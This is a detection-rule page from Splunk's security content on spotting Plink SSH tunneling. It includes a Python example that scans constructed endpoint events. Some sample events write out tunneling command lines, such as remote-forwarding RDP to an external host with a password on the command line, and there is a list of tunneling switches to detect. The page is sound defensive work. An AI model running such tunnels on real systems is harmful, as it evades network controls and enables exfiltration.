Windows Protocol Tunneling with Plink

Splunk Security Content

Summary
This analytic detects the use of Plink, the command-line SSH client shipped with PuTTY, or renamed copies of it such as pvhost.exe, when the command line indicates protocol tunneling. Plink is commonly used for egress or lateral movement because an SSH tunnel carries arbitrary traffic past network controls that only see the outer SSH session. The rule examines process-execution logs from Endpoint Detection and Response (EDR) agents for the command-line switches associated with port forwarding and tunneling, including -R (remote forward), -L (local forward), -D (dynamic SOCKS proxy), -N (no shell, forwarding only), -P (port) and -pw (password on the command line), among others. Such activity can indicate data exfiltration or unauthorized lateral movement within an organization's infrastructure. Covering both the original and renamed executables makes the detection harder to evade by simply renaming the binary. Legitimate administrative use of Plink produces the same command lines, so confirm the user, source host and SSH destination before escalating; confirmed malicious use warrants prompt investigation and remediation of the identified hosts.
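The following is an added example, not the analytic's own search logic, showing how the detection described above behaves when run over EDR process-creation events. The event field names (process_name, original_file_name, command_line, dest, user) are assumed normalized endpoint fields rather than any specific vendor's schema, and the events themselves are constructed for illustration. The renamed-binary match relies on the EDR reporting the PE OriginalFileName, which is an assumption; the last sample event shows the gap that opens when that field is empty.

```python
"""Plink protocol-tunneling detection run over sample EDR process events.

Added example; this is not the Splunk analytic's own code. Field names are
assumed normalized endpoint fields, and all events below are constructed.
"""
import shlex

# Executable names the detection covers explicitly, plus the PE
# OriginalFileName a renamed copy of plink still carries (assumption: the EDR
# exposes it as original_file_name).
PLINK_PROCESS_NAMES = {"plink.exe", "pvhost.exe"}
PLINK_ORIGINAL_FILE_NAMES = {"plink", "plink.exe"}

# Plink switches associated with port forwarding and tunneling:
# -L local forward, -R remote forward, -D dynamic SOCKS proxy, -N no shell
# (forwarding-only session), -P port, -pw password on the command line.
TUNNEL_SWITCHES = {"-R", "-L", "-D", "-N", "-P", "-pw"}


def _tokens(command_line):
    """Split a Windows command line into arguments, keeping quoted paths whole."""
    try:
        return shlex.split(command_line, posix=False)
    except ValueError:  # unbalanced quotes: fall back to whitespace split
        return command_line.split()


def is_plink(event):
    """True if the process is plink by name or by its PE original file name."""
    name = event.get("process_name", "").lower()
    orig = event.get("original_file_name", "").lower()
    return name in PLINK_PROCESS_NAMES or orig in PLINK_ORIGINAL_FILE_NAMES


def tunnel_switches(command_line):
    """Return the tunneling switches present as whole tokens, sorted.

    Whole-token, case-sensitive comparison: Plink's -P (port) is distinct from
    a lowercase -p, and substring matching would fire on any argument that
    merely contains '-L' or '-D', such as a hostname.
    """
    return sorted(t for t in _tokens(command_line) if t in TUNNEL_SWITCHES)


def detect_plink_tunneling(events):
    """Apply the two conditions of the detection: plink binary AND tunnel switch."""
    hits = []
    for ev in events:
        if not is_plink(ev):
            continue
        switches = tunnel_switches(ev.get("command_line", ""))
        if switches:
            hits.append({
                "dest": ev.get("dest"),
                "user": ev.get("user"),
                "process_name": ev.get("process_name"),
                "original_file_name": ev.get("original_file_name"),
                "switches": switches,
                "command_line": ev.get("command_line"),
            })
    return hits


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    # Remote forward of RDP out to an external host, password on the command line.
    {"dest": "WS01", "user": "CORP\\jdoe", "process_name": "plink.exe",
     "original_file_name": "Plink",
     "command_line": "plink.exe -ssh -N -R 3389:127.0.0.1:3389 svc@203.0.113.10 -pw Summer2024"},
    # Renamed copy named on the page; SOCKS proxy over port 443.
    {"dest": "WS02", "user": "CORP\\ops", "process_name": "pvhost.exe",
     "original_file_name": "Plink",
     "command_line": "pvhost.exe -D 1080 -N ops@198.51.100.7 -P 443"},
    # Interactive plink session with no forwarding switches: not a hit.
    {"dest": "JUMP01", "user": "CORP\\admin", "process_name": "plink.exe",
     "original_file_name": "Plink",
     "command_line": "plink.exe -ssh admin@10.0.0.5"},
    # Arbitrary rename, caught only through original_file_name.
    {"dest": "WS03", "user": "CORP\\build", "process_name": "updater.exe",
     "original_file_name": "Plink",
     "command_line": "updater.exe -L 8080:intranet.corp.local:80 build@203.0.113.22"},
    # OpenSSH tunnel: out of scope for this plink-specific rule.
    {"dest": "WS04", "user": "CORP\\dev", "process_name": "ssh.exe",
     "original_file_name": "ssh.exe",
     "command_line": "ssh.exe -L 5432:db.corp.local:5432 dev@10.0.0.9"},
    # Renamed plink where the EDR did not populate original_file_name: the
    # rule misses this, which is the evasion gap a renamed binary exploits.
    {"dest": "WS05", "user": "CORP\\jdoe", "process_name": "svcmon.exe",
     "original_file_name": "",
     "command_line": "svcmon.exe -N -R 8443:127.0.0.1:443 x@203.0.113.40"},
]

if __name__ == "__main__":
    for hit in detect_plink_tunneling(SAMPLE_EVENTS):
        print(hit["dest"], hit["user"], hit["process_name"], hit["switches"])
```

Running the block yields three hits (WS01, WS02 and WS03); the interactive plink session and the OpenSSH client are ignored, and the svcmon.exe copy with an empty original_file_name is missed, which is why triage should also check the image hash or signer of any unfamiliar binary opening outbound SSH.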
Categories
  • Endpoint
Data Sources
  • Process
  • Windows Registry
  • Application Log
ATT&CK Techniques
  • T1572
  • T1021.004
Created: 2024-11-13